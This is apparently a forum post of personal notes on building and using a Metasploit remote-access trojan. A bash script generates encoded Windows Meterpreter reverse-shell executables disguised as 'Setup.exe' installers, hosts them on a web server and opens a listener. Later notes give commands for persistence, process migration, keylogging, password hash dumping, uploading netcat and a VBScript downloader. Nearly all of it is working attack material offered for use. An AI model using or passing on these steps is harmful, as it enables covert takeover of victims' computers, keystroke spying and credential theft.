Quick MSF Payload

Code:

Code:

#!/bin/bash
#
# Usage ./Create.sh "DomainName.com"
#
#
#
myvar="$@"
lport="5555"
#service apache2 start && service postgresql start && msfconsole
echo "External Access $myvar RAT Setup Will Be In Binaries/FullSetup.exe"

sudo msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -p windows/meterpreter/reverse_tcp LHOST="$myvar" LPORT="$lport" -b "\x00" -f exe -o Binaries/FullSetup.exe

echo "Internal Access Int IP RAT Setup Will Be In Binaries/Setup.exe"
sudo msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -p windows/meterpreter/reverse_tcp LHOST=192.168.0.101 LPORT="$lport" -b "\x00" -f exe -o Binaries/Local_Setup.exe

sudo cp /home/USERNAME/MSF/Binaries/FullSetup.exe /var/www/html
sudo service apache2 start

clear
echo "Opening Listener..."
msfconsole -r meterpreter.rc
#Other methods:
# msfvenom -h
#
# msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -e x86/shikata_ga_nai -b '\x00' -i 3 -f python

Extended Notes & Commands I Used!

Domain.com  (Use No Ip.com)
 

Code:

sudo service apache2 start

 
 
 
Move Payloads:

sudo cp /home/jay/MSF/Binaries/FullSetup.exe /var/www/html
 
 
 

 
 
 

Code:

sessions -i 1

 
 
 
 
Persistence:
 

Code:

run persistence -U -i 5 -p 5555 -r domain.com

 

go into new session and then...

 
ps

Code:

migrate explorer.exe pid

 
 
 
 
 
 
use sniffer

Code:




keyscan_start


keyscan_dump


keyscan_stop


 

 
~~~~~~~~~~~~~~~~~~
1st move in to relative path
 

Code:

lcd /home/jay/MSF/

 
 

Code:




upload payload.exe "C:\\payload.exe"


 


upload update/netcat.zip "C:\\\Backup\\netcat.zip"


 


upload update/netcat.zip "C:\\Users/Test\\My Documents\\netcat.zip"

 

Code:




 


upload update/netcat.zip


 


upload update/7z.exe "C:\\\Backup\\7z.exe"


 


 


 


 


upload update/script.txt "C:\\script.txt"


 


 


upload update/7z.exe "7z.exe"


 


 


upload update/7z.dll "c:\\\Backup\\7z.dll"

 
 
then type 
 

Code:

shell

 
(in correct location for windows side) Unzip
 
 

Code:

7z x *.zip -o*

 
 
https://superuser.com/questions/95902/7-zip-and-unzipping-from-command-line
 
 
 
 
Use Resorces:
 

Code:

resource update/script.txt

 
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
meterpreter>

Code:

use priv

meterpreter>

Code:

hashdump

 

Code:

cd\


resource script.txt

 
 

Code:

cd c:\\Users\\test\\Desktop\\

 
 

Code:

run winenum 

 
 
offensive-security.com/metasploit-unleashed/existing-scripts

Uploading netcat.zip you can then cd netcat and use wget from windows

also you can use visual basic script

48 down vote accepted

You can write a VBScript and run it from the command line Create a file Code: downloadfile.vbs and insert the following contents: Code: ' Set your settings     strFileURL = "http://www.it1.net/images/it1_logo2.jpg"     strHDLocation = "c:\logo.jpg" ' Fetch the file     Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")     objXMLHTTP.open "GET", strFileURL, false     objXMLHTTP.send() If objXMLHTTP.Status = 200 Then Set objADOStream = CreateObject("ADODB.Stream") objADOStream.Open objADOStream.Type = 1 'adTypeBinary objADOStream.Write objXMLHTTP.ResponseBody objADOStream.Position = 0    'Set the stream position to the start Set objFSO = Createobject("Scripting.FileSystemObject") If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation Set objFSO = Nothing objADOStream.SaveToFile strHDLocation objADOStream.Close Set objADOStream = Nothing End if Set objXMLHTTP = Nothing Run it from the command line as follows: Code: cscript.exe downloadfile.vbs